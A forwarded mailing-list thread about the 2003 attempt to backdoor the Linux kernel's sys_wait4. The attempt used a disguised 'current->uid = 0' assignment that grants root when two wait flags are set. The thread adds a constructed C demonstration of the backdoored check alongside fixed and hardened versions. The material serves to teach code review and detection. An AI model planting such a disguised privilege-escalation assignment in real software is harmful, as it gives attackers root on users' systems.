Interesting message I got. Isn't that a demonstration of the *real* (no FUD) open source model security break points? It seems to me that unfortunately, theoretically, there could be many exploits of this vulnerability (or am I wrong here?).
Boaz.
*START READING FROM THE END!*
-----Original Message-----
Subject: RE: What's wrong with this code?
All-
Thanks to everyone who responded. In all I received over ten responses and all of them were great. Everyone who responded found the 'bug' (I'll explain why bug is in quotes) in the code below which was:
'current->uid = 0' and should have been 'current->uid == 0'
Basically everyone noted that since there was a missing '=' the if-statement would always return false and therefore never execute 'retval = -EINVAL'. Some responses caught the deeper problem which was that instead of checking if 'current->uid' equals zero (a comparison) the code actually sets 'current->uid' equal to zero (an assignment) when flags __WCLONE and __WALL are set. This obviously is not a good thing - the user sets two flags and becomes uid 0 (i.e. root)!
So where did I get this code? Well, this code was recently found in the Linux kernel function 'sys_wait4'. No, it wasn't a coding mistake but rather an attempt to backdoor the Linux kernel. For more information see:
http://www.securityfocus.com/news/7388
Since I received so many responses I'm considering doing a challenge like this either once or twice a month; call it "Spot the Vulnerability". I'd probably make the challenges a bit harder (more code) and ask people to identify the problem, how to fix it, and how to detect it in software engineering. Does the list think it's a worthwhile idea?
-John Walton

p.s. I made a similar mistake on my compilers program recently. It took me over two hours to find. Unfortunately, gcc doesn't warn on things like an assignment inside if-statements.
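The posted condition, the intended comparison, and a hardened spelling of it side by side, as an added example that is not from the thread or from the Linux kernel. The 'struct task' type, the WCLONE_FLAG/WALL_FLAG names and values, the local EINVAL_ERR constant and the helper functions are all constructed for this example (the kernel's own macros are __WCLONE and __WALL, and 'current' there is a macro reaching into struct task_struct); the example reproduces the observable effect of the one-character difference: the backdoored check never rejects anything, and quietly leaves the caller with uid 0.

```c
#include <stdio.h>

/* Constructed stand-in for the kernel's per-task state; the real field lives in
 * struct task_struct and is reached through the 'current' macro. */
struct task {
    unsigned int uid;
};

/* Option bits as used by the posted condition. Names and values are assumptions
 * for this example; the kernel's own macros are __WCLONE and __WALL. */
#define WCLONE_FLAG 0x80000000u
#define WALL_FLAG   0x40000000u

/* errno value for "invalid argument", defined locally so no kernel headers are needed. */
#define EINVAL_ERR 22

/* The posted ('backdoored') condition. The single '=' assigns 0 to uid; the value of
 * that assignment expression is 0, so the && is false and retval is never set.
 * The extra parentheses around the assignment are what keep gcc's -Wparentheses
 * from reporting an assignment used as a truth value. */
int check_options_backdoored(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (WCLONE_FLAG | WALL_FLAG)) && (current->uid = 0))
        retval = -EINVAL_ERR;
    return retval;
}

/* The intended check: reject this flag combination when the caller is uid 0. */
int check_options_fixed(const struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (WCLONE_FLAG | WALL_FLAG)) && (current->uid == 0))
        retval = -EINVAL_ERR;
    return retval;
}

/* Hardened spelling of the same check: with the constant on the left, a dropped '='
 * becomes '0 = current->uid', which is not assignable and fails to compile. */
int check_options_const_left(const struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (WCLONE_FLAG | WALL_FLAG)) && (0 == current->uid))
        retval = -EINVAL_ERR;
    return retval;
}

enum variant { BACKDOORED = 0, FIXED = 1, CONST_LEFT = 2 };

static int run_variant(enum variant v, struct task *t, unsigned int options)
{
    switch (v) {
    case BACKDOORED: return check_options_backdoored(t, options);
    case FIXED:      return check_options_fixed(t, options);
    default:         return check_options_const_left(t, options);
    }
}

/* Return value of one variant for a task that starts at start_uid. */
int retval_of_check(enum variant v, unsigned int start_uid, unsigned int options)
{
    struct task t = { start_uid };
    return run_variant(v, &t, options);
}

/* The task's uid after one variant has run, so the silent privilege change
 * (1000 -> 0) is observable as a plain return value. */
unsigned int uid_after_check(enum variant v, unsigned int start_uid, unsigned int options)
{
    struct task t = { start_uid };
    (void)run_variant(v, &t, options);
    return t.uid;
}

int main(void)
{
    unsigned int both = WCLONE_FLAG | WALL_FLAG;
    printf("backdoored, uid 1000, both flags -> retval %d, uid %u\n",
           retval_of_check(BACKDOORED, 1000u, both), uid_after_check(BACKDOORED, 1000u, both));
    printf("backdoored, uid 1000, one flag   -> retval %d, uid %u\n",
           retval_of_check(BACKDOORED, 1000u, WCLONE_FLAG), uid_after_check(BACKDOORED, 1000u, WCLONE_FLAG));
    printf("fixed,      uid 1000, both flags -> retval %d, uid %u\n",
           retval_of_check(FIXED, 1000u, both), uid_after_check(FIXED, 1000u, both));
    printf("fixed,      uid 0,    both flags -> retval %d\n",
           retval_of_check(FIXED, 0u, both));
    return 0;
}
```

The short-circuit in '&&' matters for the reading of the backdoor: with only one of the two flags set the first operand is false and the assignment never runs, so the uid change is triggered only by the exact flag combination the message describes.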
-----Original Message-----
Subject: What's wrong with this code?
Folks-
Here is a little bit of a challenge for you. Take a look at the code below and find what is wrong with it and why:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;
Note: "__WCLONE" and "__WALL" are flags you can pass the program. For those of you who have seen or heard about this already don't spoil it for everyone else.
-John Walton.